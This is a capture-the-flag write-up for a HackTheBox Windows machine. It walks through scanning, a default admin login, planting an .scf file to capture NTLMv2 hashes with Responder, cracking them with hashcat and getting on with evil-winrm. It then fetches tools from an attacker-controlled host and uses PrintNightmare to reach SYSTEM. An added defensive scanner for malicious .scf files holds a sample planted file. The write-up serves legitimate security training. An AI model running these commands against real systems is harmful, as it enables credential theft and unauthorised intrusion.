nmap -sC -sS -sV -F 10.10.11.106 >scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 13:34 EEST
Nmap scan report for 10.10.11.106 (10.10.11.106)
Host is up (0.084s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
|   date: 2021-10-16T17:34:49
|_  start_date: 2021-10-16T15:11:52
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.57 seconds
If we try to open the web page, it asks for a login. I just tried admin - admin and it worked…
/etc/hosts, we can see Firmware Updates as the only working tab.
Getting the foothold
… firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
According to the text on the page, the file is uploaded to an SMB share, and the team reviews the uploads from there.
A Shell Command File (.scf) is processed by Explorer as soon as a user browses the folder that contains it. The file can point its icon at a remote path, and Explorer will try to authenticate to that path with the browsing user's credentials.
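As an added example (not part of this write-up), here is a small Python scanner that the owner of a writable upload share could run over the directory behind it to flag .scf files whose icon points at a UNC path on another host, which is exactly the trick described above. The sample files and the 203.0.113.5 address are constructed for the demo.

```python
import configparser
import re
import tempfile
from pathlib import Path

# A UNC path (\\host\share\...), excluding the local \\?\ and \\.\ device prefixes.
UNC_RE = re.compile(r"^\\\\(?![?.]\\)[^\\]+\\")

def scf_remote_icon(path: Path):
    """Return the IconFile target when this .scf points at a UNC path, else None."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(path.read_text(errors="replace"))
    except configparser.Error:
        return None  # not a parseable INI-style file, so nothing to flag here
    icon = parser.get("Shell", "IconFile", fallback="").strip()
    return icon if UNC_RE.match(icon) else None

def scan_share(root: Path):
    """List (name, target) for every .scf under root whose icon lives on another host."""
    findings = []
    for p in sorted(root.rglob("*.scf")):
        target = scf_remote_icon(p)
        if target:
            findings.append((p.name, target))
    return findings

# Constructed sample share: one planted SCF, one harmless SCF, one ordinary upload.
SAMPLES = {
    "@zebra.scf": "[Shell]\nIconFile=\\\\203.0.113.5\\share\\zebra.ico\n",
    "readme.scf": "[Shell]\nIconFile=C:\\Windows\\explorer.exe,3\n",
    "firmware_v2.bin": "not an ini file at all",
}

def demo():
    """Write the samples into a temp dir and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in SAMPLES.items():
            (root / name).write_text(body)
        return scan_share(root)

if __name__ == "__main__":
    for name, target in demo():
        print(f"ALERT: {name} points its icon at the remote path {target}")
```

A file name starting with "@" sorts to the top of the listing, so the scanner keeps the name in its output to make that pattern visible in alerts.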
If we upload the SCF @zebra.scf (we can use the @ prefix so the file stays at the top of the share listing) with the given content and run responder, we can grab the user's hash:
responder -wrf --lm -v -I tun0
We get the following:
To crack the NTLMv2 hash, we can dump it to a file (hash.txt) and crack it using hashcat:
hashcat -m 5600 hash.txt /usr/share/dict/rockyou.txt -o cracked.txt
After getting the password, we might be able to log in. The shared folders on the Samba server don't seem to be accessible. I couldn't find anything for a while, so I decided to do a deeper port scan.
There is an open port, 5985, which nmap reports as an HTTP service; a quick search shows it is actually the Windows remote management service (comparable to SSH). Using evil-winrm we can connect as the user with the cracked password.
evil-winrm -i 10.10.11.106 -u tony -p *****
Aaand we got the user flag!
The box has no Internet connection to download privilege escalation scripts from, but we can serve them from a local HTTP server started in the folder with the tools:
python -m http.server -d ../Tools 8080
In the reverse shell, we can download them with:
Invoke-WebRequest http://10.10.14.111:8080/winPEAS.bat -OutFile winpeas.bat
After scanning and not finding anything, I googled the vulnerabilities available for the current version. The most recent one is about the Print Spooler (PrintNightmare), which lets you escalate privileges easily.
To use the CVE exploit, I followed this blog post. In summary, you start an SMB server on your host, share a .dll that contains a reverse shell, run the Python exploit and wait for the shell to connect.
After those steps, we are NT AUTHORITY\SYSTEM:
C:\Windows\system32>whoami
nt authority\system
Then, we can get the root flag as usual by going to the Administrator’s desktop.
C:\Users\Administrator\Desktop>type root.txt
******************
To know more
First of all, I was lucky to hit the right vulnerability with the Print Spooler; the correct way to check for it was to run:
rpcdump.py @10.10.11.106 | grep MS-RPRN
We can only run the printnightmare exploit when the Print System Remote Protocol (MS-RPRN) is exposed.
That script gave us access to the Administrator account, although it seems not to have enough administrator rights to own the whole machine. Another way to perform the printnightmare exploit is to run the script locally from tony's PowerShell session.
upload command we can upload our local copy of the exploit so that user tony can execute it. But the Execution Policy is Restricted, so we cannot run the script as usual. We have to bypass the Execution Policy (there are many ways, but I chose a simple one) by using the
python -m http.server 8001
IEX command, which automatically imports the module, so we can simply run:
Invoke-Nightmare -NewUser "zebra" -NewPassword "zebra1234"
Then connect as the new user with evil-winrm; this one has full administrator rights.
- More info about PrintNightmare: Playing with PrintNightmare. "CVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows for a low-priv user to escalate to administrator on a local box or on a remote server. This is especially bad because it is not uncommon for Domain Controllers to have an exposed print spooler, and thus, this exploit can take an attacker from low-priv user to domain admin. There are a few proof of concept exploits out there, and I wanted to give them a spin on an old HackTheBox machine. I'll also look at disabling the Print Spooler and how it breaks the exploits, and discuss the July 6 patch."
- Invoke-Nightmare PowerShell module: GitHub - calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)